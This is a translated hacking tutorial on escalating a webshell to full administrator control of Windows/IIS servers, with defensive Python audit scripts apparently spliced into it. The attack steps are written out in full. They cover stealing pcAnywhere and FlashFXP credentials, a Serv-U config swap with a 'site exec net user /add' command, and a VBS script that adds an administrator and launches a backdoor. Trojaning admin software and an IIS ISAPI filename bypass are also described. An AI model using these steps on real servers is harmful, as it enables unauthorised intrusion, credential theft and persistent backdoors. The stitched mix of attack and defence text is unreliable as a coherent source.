Monopoly Privilege Escalation Overview

Source: Internet
Author: User
Tags: pcanywhere

Webshell privilege escalation has always been one of the most popular scripting topics, and of course also the most difficult one. So, based on my own escalation methods and the files I have collected from the network, this chapter introduces a webshell privilege escalation tutorial. I hope you can learn something from it; please add to it actively so that we make progress together!
*****************************************************************************

Usually anonymous permission (ASP)

ASP.NET: USER permissions

net.exe, net1.exe, netstat.exe, ftp.exe

Self-uploaded files


The list of escalation methods included in this tutorial:

Lesson 1: Overview of privilege escalation (the concept of privilege escalation, general permissions, and common third-party software)

Lesson 2: pcAnywhere privilege escalation (solving the problem that passwords cannot be read in later versions)

Lesson 3: Privilege escalation via the Serv-U server (when the Serv-U directory has modify permission)

Lesson 4: Privilege escalation via the Serv-U server (when the Serv-U directory does not have modify permission)

Lesson 5: Privilege escalation via the G6FTP server (another new FTP server after Serv-U)

Lesson 6: Privilege escalation by cracking HASHes (the best penetration method for server clusters)

Lesson 7: Sniffing the 3389 password with CAIN (a good way when the target host has no vulnerabilities)

Lesson 8: SA password escalation (search carefully for the CONN files)

Lesson 9: Privilege escalation by cracking the VNC password (read the VNC password from the Registry)

Lesson 10: Service replacement privilege escalation (the oldest escalation method)

Lesson 11: MYSQL root password escalation (the latest and most effective escalation method)

Lesson 12: Privilege escalation in a Tomcat environment (using JSP to run with system permissions)

Lesson 12: FlashFXP file replacement privilege escalation (using social engineering)

Lesson 13: Privilege escalation by modifying the run permission of asp.dll

Lesson 14: Privilege escalation using radmin

Lesson 15: Privilege escalation using VBS scripts

Lesson 16: Port forwarding to solve intranet privilege escalation

Lesson 17: Privilege escalation using the jet overflow

Lesson 18: Privilege escalation using the NC reverse-connection (bounce) function

Lesson 19: Privilege escalation using WinRAR

Lesson 20: MS06040 / MS06035 privilege escalation through the intranet

More to be added ...


**************************** Common Methods ****************************
Speaking of getting a webshell:
of course I still want to go on and obtain admin permission on the whole server; a hacker who does not want admin permission is not a good hacker ~
Heh ~~ Come with me and see what can be used to escalate permissions.
*****************************************************************************
First
If pcAnywhere Server is installed on the server (administrators install it to make management convenient),
it gives us convenience too: download the *.cif files under Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\ on the system disk to your local machine.
If the password can be cracked, connecting with pcAnywhere will work.
*****************************************************************************
Second
A lot of people have asked me how to escalate the IIS user permission of a webshell.
Generally, server management is done on the local machine and the files are uploaded to the web space;
FTP is used for that, and Serv-U is the most widely used FTP server.
So we can use Serv-U to escalate permissions.
Escalating through Serv-U requires write permission on the Serv-U installation directory ~
First, access ServUDaemon.ini in the Serv-U installation folder through the webshell and download it.
Then install Serv-U on the local machine and overwrite ServUDaemon.ini in the local installation folder with the downloaded one.
Start Serv-U and add a user, set it as system administrator, with home directory C:\ and execute permission.
Then go to the Serv-U installation directory on the server and replace its ServUDaemon.ini with the modified one.

Connect with the newly added user and password ~
Okay, it connects.
ftp
ftp> open ip
Connected to ip.
220 Serv-u ftp Server v5.0.0.4 for WinSock ready...
User (ip:(none)): id                  // the user you just added
331 User name okay, please send complete E-mail address as password.
Password: password                    // the password
230 User logged in, proceed.
ftp> cd winnt                         // enter the winnt directory of win2k
250 Directory changed to /WINNT
ftp> cd system32                      // enter the system32 directory
250 Directory changed to /WINNT/system32
ftp> quote site exec net.exe user rover rover1234 /add   // use the system's net.exe to add a user
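A defender's counterpart to the Serv-U procedure above, added here as an example and not code from the original tutorial: a small audit that parses a ServUDaemon.ini and flags accounts that carry the combination the procedure relies on (system-level maintenance privilege, a drive-root home directory, execute rights on a path). The sample ini is constructed; its layout is modelled on Serv-U 5 files, and the key names used (Maintenance, HomeDir, AccessN with an E flag for execute) are assumptions to verify against your own installation.

```python
import configparser
import re
from dataclasses import dataclass, field

# Constructed sample ServUDaemon.ini (not taken from any real server). The layout
# is modelled on Serv-U 5 files; the key names are assumptions, so check them
# against a real installation before relying on this audit.
SAMPLE_INI = r"""
[GLOBAL]
Version=5.0.0.4

[DOMAIN1]
ServerName=example-domain
PortNo=21
User1=webftp|1|0
User2=rover|1|0

[USER=webftp|1]
Password=cs0123456789abcdef0123456789abcdef
HomeDir=D:\wwwroot\site1
RelPaths=1
Access1=D:\wwwroot\site1|RWAMLCD

[USER=rover|1]
Password=csfedcba9876543210fedcba9876543210
HomeDir=C:\
RelPaths=1
Maintenance=System
Access1=C:\|RWAMELCDP
"""

DRIVE_ROOT = re.compile(r"[a-z]:\\?$")  # matches "c:" or "c:\" (lower-cased input)


@dataclass
class Finding:
    user: str
    reasons: list = field(default_factory=list)


def audit_servu_ini(text: str) -> list:
    """Return one Finding per account whose settings look like an escalation account."""
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.optionxform = str            # keep key names as written (Serv-U keys are CamelCase)
    cp.read_string(text)
    findings = []
    for section in cp.sections():
        if not section.upper().startswith("USER="):
            continue                # only [USER=name|id] sections describe accounts
        user = section[len("USER="):].split("|", 1)[0]
        opts = cp[section]
        finding = Finding(user)
        # Assumed key: Maintenance=System marks a system administrator account
        if opts.get("Maintenance", "").strip().lower() == "system":
            finding.reasons.append("system-level maintenance privilege")
        home = opts.get("HomeDir", "").strip().lower()
        if DRIVE_ROOT.match(home):
            finding.reasons.append(f"home directory is a drive root ({opts.get('HomeDir')})")
        for key, value in opts.items():
            # Assumed layout AccessN=<path>|<flags>; E is assumed to grant execute (SITE EXEC)
            if key.lower().startswith("access") and "|" in value:
                path, flags = value.rsplit("|", 1)
                if "E" in flags.upper():
                    finding.reasons.append(f"execute right on {path}")
        if finding.reasons:
            findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in audit_servu_ini(SAMPLE_INI):
        print(f.user, "->", "; ".join(f.reasons))
```

Run it against a copy of the live ini; any account other than the ones you deliberately created that shows all three reasons is worth treating as a tampered configuration, together with checking who can write the Serv-U installation directory.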

If you are prompted that you do not have permission,
upload the backdoor (server.exe) to the system32 directory.
Then write a VBS script:
Set wshshell = CreateObject("WScript.Shell")
a = wshshell.Run("cmd.exe /c net user user pass /add", 0)
b = wshshell.Run("cmd.exe /c net localgroup Administrators user /add", 0)
b = wshshell.Run("cmd.exe /c server.exe", 0)

Save it as xx.vbe.
What this script does is set the password of the account "user" to pass,
promote it to administrator,
and then run server.exe from the system32 directory.
Put this script into the C:\Documents and Settings\All Users\Start Menu\Programs
directory (the startup entries).
In this way the administrator will execute the script as soon as he logs in.
The next step is to wait. Wait for him to log on.
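A detection-side example for the startup-folder trick above, added here and not code from the original tutorial: scan an all-users Startup directory for script and executable entries and flag those whose contents reference the same primitives the script above uses (WScript.Shell, net user, net localgroup). The two Startup paths are assumptions for the Windows 2000/XP and Vista-and-later layouts; the demo builds a constructed temporary folder so it also runs on a non-Windows machine.

```python
import tempfile
import time
from pathlib import Path

# Assumed locations of the all-users Startup folder (2000/XP layout and Vista+ layout).
STARTUP_DIRS = [
    r"C:\Documents and Settings\All Users\Start Menu\Programs\Startup",
    r"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup",
]
SCRIPT_EXTENSIONS = {".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh", ".hta", ".bat", ".cmd", ".ps1", ".exe"}
# Strings a dropped privilege-escalation script typically contains (compared lower-cased).
INDICATORS = ("wscript.shell", "net user", "net localgroup", "administrators", "cmd.exe /c")


def scan_startup_folder(folder, max_age_days=None):
    """Return one finding per script/executable entry in a Startup folder."""
    folder = Path(folder)
    findings = []
    if not folder.is_dir():
        return findings
    now = time.time()
    for entry in sorted(folder.iterdir()):
        suffix = entry.suffix.lower()
        if not entry.is_file() or suffix not in SCRIPT_EXTENSIONS:
            continue
        age_days = (now - entry.stat().st_mtime) / 86400
        if max_age_days is not None and age_days > max_age_days:
            continue
        hits = []
        if suffix != ".exe":
            # Read a bounded prefix as text and look for the indicator strings
            head = entry.read_bytes()[:65536].decode("latin-1").lower()
            hits = [ind for ind in INDICATORS if ind in head]
        findings.append({
            "path": str(entry),
            "age_days": round(age_days, 1),
            "indicators": hits,
            "severity": "high" if hits or suffix == ".exe" else "medium",
        })
    return findings


def build_demo_folder():
    """Construct a temporary Startup folder with one benign and one suspicious entry."""
    d = Path(tempfile.mkdtemp(prefix="startup_demo_"))
    (d / "Corporate Portal.url").write_text("[InternetShortcut]\nURL=http://intranet.example/\n")
    (d / "xx.vbe").write_text(   # same content as the script in the text, used as test input
        'Set wshshell = CreateObject("WScript.Shell")\n'
        'a = wshshell.Run("cmd.exe /c net user user pass /add", 0)\n'
        'b = wshshell.Run("cmd.exe /c net localgroup Administrators user /add", 0)\n'
    )
    return d


if __name__ == "__main__":
    for f in scan_startup_folder(build_demo_folder()):
        print(f)
    for real in STARTUP_DIRS:      # on a Windows host, also scan the real folders
        for f in scan_startup_folder(real, max_age_days=30):
            print(f)
```

The age filter is there so the scan can be run on a schedule and only report entries that appeared since the last baseline; a .exe in the Startup folder is reported regardless of content, because the text's trick drops server.exe alongside the script.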

Third
Check the system services, the programs that start automatically with the system, and the software administrators use frequently, such as Norton, VAdministrator, Kingsoft, Rising, WinRAR and even QQ: can they be written to? If so, modify the program, bind a batch file or VBS to it, and wait for the server to restart.
*****************************************************************************
Fourth
Find the conn and config files and read through them to see whether you can get the sa or mysql password,
and so on.
*****************************************************************************
Fifth
FlashFXP can also be used to escalate permissions, but the success rate depends on your luck.
First, find the FlashFXP folder and open (edit) Sites.dat. This file contains the user names and passwords;
the passwords are encrypted. If I copy these files back to my local machine and replace the local files, then when I open FlashFXP the site manager shows the same sites as on the server. You can add N more bots ~~ heh ~

Huh?? No, this is about escalating permissions; don't give up halfway.
Let's look at the other administrator's site manager: the user name and password are shown as asterisks. Use an XP asterisk password viewer to view them; the passwords that are encrypted in Sites.dat are then displayed in plain text. That way the administrator's passwords for a whole pile of sites are retrieved.
Next, you can connect to these new servers ~~
After testing, you only need to replace the corresponding local file with the Sites.dat file containing the passwords and user names
to recover the administrator's password for each site.
*****************************************************************************
Sixth

On WIN2K + IIS 5.0 the application protection option defaults to "Medium (Pooled)"; in that case ISAPIs loaded by IIS
run under the identity of the IWAM_computername user.
However, by default WIN2K + IIS5 loads certain special ISAPIs as SYSTEM. Win2k + iis5,
win2k + iis5 + sp1 and win2k + iis5 + sp2 decide this by a simple check of the ISAPI file name, with no directory restriction.
The ISAPIs loaded with SYSTEM permission include:
1. idq.dll
2. httpext.dll
3. httpodbc.dll
4. ssinc.dll
5. msw3prt.dll
6. author.dll
7. admin.dll
8. shtml.dll
9. sspifilt.dll
10. compfilt.dll
11. pwsdata.dll
12. md5filt.dll
13. fpexedll.dll

Therefore it is easy to obtain SYSTEM permission. There is also a bug in how the file name is determined: a request such as /scripts/test%81%5cssinc.dll is also treated as a request for ssinc.dll, because the double-byte Far East versions are not taken into account when the file path is split. ssinc.dll also has a problem when processing the path of an included file: of "/" and "\" it recognises only "/", so a path containing "\" may be handled incorrectly, which can lead to information leakage or permission vulnerabilities. Many other vulnerabilities (such as in php and asp) exist as well.

Loading these ISAPIs should be decided by the path rather than solely by the file name; this should be corrected.
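To make the last point concrete, here is an added example (not code from the original text, and not how IIS itself is implemented) that contrasts the two decision rules. The naive function reproduces the flaw described above: it percent-decodes the request, splits on '/' or 0x5C byte by byte, and compares only the final component, so /scripts/test%81%5cssinc.dll passes as ssinc.dll. The path-based function first decodes with the server's double-byte code page (assumed here to be GBK, so 0x81 0x5C is one character rather than a separator), normalises the full path, and accepts it only if it is one of an explicit allowlist of full virtual paths; that allowlist is a hypothetical deployment layout, not an IIS default.

```python
import posixpath
import re
from urllib.parse import unquote_to_bytes

# Names that the text says IIS 5 loads as SYSTEM when it sees them in the request.
PRIVILEGED_ISAPI_NAMES = {
    "idq.dll", "httpext.dll", "httpodbc.dll", "ssinc.dll", "msw3prt.dll",
    "author.dll", "admin.dll", "shtml.dll", "sspifilt.dll", "compfilt.dll",
    "pwsdata.dll", "md5filt.dll", "fpexedll.dll",
}

# Hypothetical allowlist: the full virtual paths at which those DLLs are legitimately
# mapped on this particular server. These are assumptions for the example only.
PRIVILEGED_ISAPI_PATHS = {
    "/isapi/ssinc.dll",
    "/_vti_bin/_vti_aut/author.dll",
    "/_vti_bin/_vti_adm/admin.dll",
}


def loads_as_system_naive(request_path: str) -> bool:
    """The flawed rule the text describes: percent-decode, split on '/' or '\\'
    byte by byte (no DBCS awareness), and compare only the last component."""
    raw = unquote_to_bytes(request_path)
    last = re.split(rb"[/\\]", raw)[-1]
    return last.decode("latin-1").lower() in PRIVILEGED_ISAPI_NAMES


def resolve_request_path(request_path: str, codepage: str = "gbk") -> str:
    """Decode with the server's double-byte code page so that a lead byte such as 0x81
    consumes the following 0x5C as part of one character, then normalise the path."""
    raw = unquote_to_bytes(request_path)
    text = raw.decode(codepage)           # 0x81 0x5C -> one CJK character, not a '\\'
    text = text.replace("\\", "/")        # only after DBCS decoding may '\\' act as a separator
    return posixpath.normpath("/" + text.lstrip("/")).lower()


def loads_as_system_safe(request_path: str, codepage: str = "gbk") -> bool:
    """Path-based rule: the normalised full path must be an allowlisted entry."""
    return resolve_request_path(request_path, codepage) in PRIVILEGED_ISAPI_PATHS


if __name__ == "__main__":
    for req in ("/isapi/ssinc.dll", "/scripts/test%81%5cssinc.dll",
                "/scripts/ssinc.dll", "/scripts/..%5cisapi/ssinc.dll"):
        print(f"{req:36} naive={loads_as_system_naive(req)!s:5} safe={loads_as_system_safe(req)}")
```

The order of operations is the whole point: percent-decoding, code-page decoding and separator normalisation must all happen before the comparison, and the comparison must be against the full path, otherwise a DLL copied into a writable directory such as /scripts is indistinguishable from the legitimate one.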
General default
